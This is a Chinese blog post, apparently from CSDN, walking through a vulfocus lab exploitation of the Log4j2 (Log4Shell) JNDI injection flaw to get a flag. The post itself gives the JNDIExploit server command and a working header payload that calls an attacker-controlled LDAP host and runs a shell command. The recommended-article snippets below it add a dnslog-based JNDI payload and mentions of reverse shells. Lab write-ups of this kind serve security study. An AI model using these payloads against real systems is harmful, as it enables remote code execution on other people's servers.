vulfocus复现:Log4j2远程命令执行2

最新推荐文章于 2024-07-31 20:01:38 发布
最新推荐文章于 2024-07-31 20:01:38 发布
阅读量838 收藏 4
点赞数 2
分类专栏: 漏洞复现 文章标签: log4j java 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/woai_zhongguo/article/details/125811618
版权

1.开启靶机环境并访问

2.使用JNDIExploit.v1.2在自己的vps上开启服务

工具下载:

链接:https://pan.baidu.com/s/1oCfHPw-mMBPDDjNy-RO1YA 
提取码:4x5j
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i xx.xx.xx.xx(vps公网IP) -l 1234 -p 2345

3.抓包填写payload,获得flag

payload:

X-Api-Version:${jndi:ldap://xx.xx.xx.xx:1234/TomcatBypass/TomcatEcho}
Content-Type:application/x-www-from-urlencoded
Cmd:ls /tmp

 完成

如果可以帮助到你,劳烦点点赞哦!

声明: 本文章仅供学习使用,不得用于未授权的渗透测试,禁止用于非法用途。

 

 

woai_zhongguo
关注
专栏目录
【漏洞复现Log4j2远程命令执行(CVE-2021-44228)
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
08-21 1254
Apache Log4j2 是一个基于 Java 的日志记录工具。该工具重写了 Log4j 框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。在大多数情况下,开发者可能会将用户输入导致的错误信息写入日志中。攻击者利用此特性可通过该漏洞构造特殊的数据请求包,最终触发远程代码执行。影响范围。
【漏洞复现】Apache Log4j2 远程代码执行漏洞
做自己喜欢的事,并将其发挥到极致!
07-20 983
ApacheLog4j2是一个·基于Java的日志记录工具,该工具重写了Log4j框架,并且引入大量丰富的特性,该日志框架被大量用于业务系统开发,用来记录日志信息。由于Log4j2组件在处理程序日志记录时存在JNDI注入缺陷,未经授权的攻击者利用该漏洞,可向目标服务器发送精心构造的恶意数据,触发Log4j2组件解析缺陷,实现目标服务器的任意代码执行,获得目标服务器权限。......
vulfocus复现Log4j2远程命令执行(CVE-2021-44228)
m0_71518346的博客
12-17 875
富的特性。该日志框架被大量用于业务Apache Log4j2 是一个基于 Java 的日志记录工具。该工具重写了 Log4j 框架,并且引入了大量丰系统开发,用来记录日志信息。在大多数情况下,开发者可能会将用户输入导致的错误信息写入日志中。攻击者利用此特性可通过该漏洞构造特殊的数据请求包,最终触发远程代码执行log4j2中存在JNDI注入漏洞,当程序记录用户输入的数据时,即可触发该漏洞。成功利用该漏洞可在目标服务器上执行任意代码。
vulfocus.fofa靶场Log4j2远程命令执行2
weixin_48817799的博客
12-29 5106
vulfocus.fofa靶场Log4j2远程命令执行2前言一、靶场复现总结 前言 名称: ghcr.io/christophetd/log4shell-vulnerable-app:latest 描述: log4j2 漏洞的请求头的触发点环境,请求头 X-Api-Version字段 一、靶场复现 工具:JNDIExploit-1.3-SNAPSHOT.jar 1.打开靶场http://vulfocus.fofa.so 2.使用vps启动工具 java -jar JNDIExploit-1.3.
Log4j2远程命令执行2-vulfocus-wp
miojjnum的博客
12-22 3786
vulfocuslog4j2 漏洞的请求头的触发点环境,请求头 X-Api-Version字段 1、首先准备一个vps环境(腾讯云阿里云都可) 在vps上开启ldap环境: 输入命令开启监听: java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 你的vps的IP地址 -l 7000 -p 5000 2、bp抓包伺候 ...
vulfocus-fofa靶场 Log4j2远程命令执行
weixin_48817799的博客
12-29 4364
Log4j2远程命令执行前言一、Apache Log4j2是什么?二、复现步骤1.工具2.复现过程 前言 一、Apache Log4j2是什么? Apache Log4j2 是一个基于 Java 的日志记录工具。该工具重写了 Log4j 框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。 在大多数情况下,开发者可能会将用户输入导致的错误信息写入日志中。攻击者利用此特性可通过该漏洞构造特殊的数据请求包,最终触发远程代码执行。 二、复现步骤 1.工具 工具:JNDI-Inje
vulfocus靶场环境复现Log4j2远程命令执行漏洞
Onlyone_1314的博客
01-05 2999
声明:文章所提供的内容和工具仅供于个人学习和研究,严禁传播者利用本文章的相关内容进行非法测试。由于传播、利用此文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。 用vulfocus启动一个靶场环境,Apache Log4j2 是一个基于 Java 的日志记录工具。该工具重写了 Log4j 框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。 在大多数情况下,开发者可能会将用户输入导致的错误信息写入日志中。攻击者利用此特性.
apache log4j2vulfocus靶场漏洞复现
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
10-21 1368
Apache Log4j2被曝出一个高危漏洞,攻击者通过jndi注入攻击的形式可以轻松远程执行任何代码。apache log4j2vulfocus靶场漏洞复现,随后官方紧急推出了2.15.0和2.15.0-rc1新版本修复,依然未能完全解决问题,现在已经更新到2.15.0-rc2(近日已推出2.16版本)。该漏洞被命名为Log4Shell,编号CVE-2021-44228 一、环境搭建-vulfocus靶场,本次漏洞复现采用vulfocuslog4j2靶场docker,使用Kali系统进行复现实验。
Log4j2远程命令执行(CVE-2021-44228)复现
weixin_47781572的博客
03-01 6390
漏洞说明 Log4j是Apache的开源日志记录组件。Log4j2Log4j的升级版本,通过重写Log4j引入了丰富的功能特性。该日志组件被广泛应用于业务系统开发,用以记录程序输入输出日志信息。 由用于 Log4j 2 提供的 lookup 功能造成的,该功能允许开发者通过一些协议去读取相应环境中的配置。
vulfocus-fofa靶场 Log4j2远程命令执行复现
weixin_48817022的博客
12-31 5117
Log4j2远程命令执行复现 文章目录Log4j2远程命令执行复现前言一、Apache Log4j2漏洞描述二、复现环境01.工具02.漏洞验证过程03.反弹shell总结 前言 一、Apache Log4j2漏洞描述 描述: Apache Log4j2 是一个基于 Java 的日志记录工具。该工具重写了 Log4j 框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。 在大多数情况下,开发者可能会将用户输入导致的错误信息写入日志中。攻击者利用此特性可通过该漏洞构造特殊的
Apache Log4j2 远程代码执行
qq_43679531的博客
01-21 3221
iptables -I INPUT -p tcp --dport 9999 -j ACCEPT iptables -I INPUT -p tcp --dport 1099 -j ACCEPT iptables -I INPUT -p tcp --dport 8180 -j ACCEPT iptables -I INPUT -p tcp --dport 1389 -j ACCEPT 工具 链接:百度网盘 请输入提取码 提取码:6ldj java -jar JNDI-Injectio..
最牛逼的 Java 日志框架,性能无敌,横扫所有对手。。
十指波课堂的博客
04-19 362
Logback 算是JAVA 里一个老牌的日志框架,从06年开始第一个版本,迭代至今也十几年了。不过logback最近一个稳定版本还停留在 2017 年,好几年都没有更新;logback的兄弟 slf4j 最近一个稳定版也是2017年,有点凉凉的意思。而且 logback的异步性能实在拉跨,功能简陋,配置又繁琐,远不及Apache 的新一代日志框架 - Log4j2目前来看,Log4j2 就是王者...
分析Apache Log4j2 远程代码执行漏洞_log4j2漏洞2,统统给你解决
2401_83740189的博客
04-14 1183
外链图片转存中…(img-cGAmpnxA-1713052951399)][外链图片转存中…(img-tAkhHIAg-1713052951400)][外链图片转存中…(img-JbocLAWd-1713052951400)][外链图片转存中…(img-Tu3mJCi3-1713052951401)][外链图片转存中…(img-pAA8Ejf2-1713052951401)][外链图片转存中…(img-cMAOKTbL-1713052951401)]
Log4j2远程命令执行复现
qq_18811919的博客
04-04 616
本篇文章讲解了Log4j2的常见利用手法,该漏洞影响的范围非常大在护网中经常会使用重大漏洞Get WebShell后续攻击内网横向移动拿到靶标,后续我会推出李同学红队仿真靶场尽可能的还原护网场景感兴趣的朋友关注下。
《漏洞研究》Apache Log4j2 远程代码执行漏洞_apache log4j2远程代码执行漏洞
04-15 1322
LDAP 目录服务是由目录数据库和一套访问协议组成的系统,目录服务是一个特殊的数据库,用来保存描述性的、基于属性的详细信息,我们可以理解为是一个为可以查询、浏览和搜索而优化的分布式数据库,它呈树状结构组织数据,简单点理解:就是有一个类似于字典的数据源,可以通过LDAP协议,lookup查询传一个name进去,就能获取到数据。RMI是Java中的一种远程方法调用机制,使用RMI,可以在不同的Java虚拟机(JVM)之间进行对象之间的方法调用。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!
Log4j-2命令执行复现及分析
weixin_46137328的博客
12-12 1041
0x00 漏洞描述Apache Log4j2是一个基于Java的日志记录框架。正常情况下,开发者可能会将错误信息写入日志中,可以利用此特点构造特殊的数据请求包,最终触发远程代码执行RCE漏...
log4j2远程执行代码CVE-2021-44228复现
最新发布
2201_75891821的博客
07-31 278
可以看到有三个服务,看到熟悉的rmi和ldap ,实际上这个jar的作用就是帮我们生成了恶意代码类,并且生成了对应的url,然后我们就可以回到刚才的网站去进行JNDI注入 另外开启监听。上传参数 solr/admin/cores?action=${jndi:ldap://${sys:java.version}.jxmxiy.dnslog.cn 获得java版本号。发现 /solr/admin/cores?action=参数 可以上传 如下图。下载JDNI,放到攻击机,输入如下命令。开始准备反弹shell。
log4j2远程代码执行漏洞原理及复现
m0_57967573的博客
04-29 1703
log4j2 框架下的 lookup 查询服务提供了 {} 字段解析功能,传进去的值会被直接解析。例如 ${java:version} 会被替换为对应的 java 版本。这样如果不对 lookup 的出栈进行限制,就有可能让查询指向任何服务
Log4j2安全漏洞复现及解决
Log4j2中,如果日志消息包含特定的JNDI LDAP(轻量级目录访问协议)或RMI(远程方法调用)格式的引用,攻击者可以通过构造恶意的日志输入来触发远程代码执行。 文档中提供的`pom.xml`片段展示了如何创建一个...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值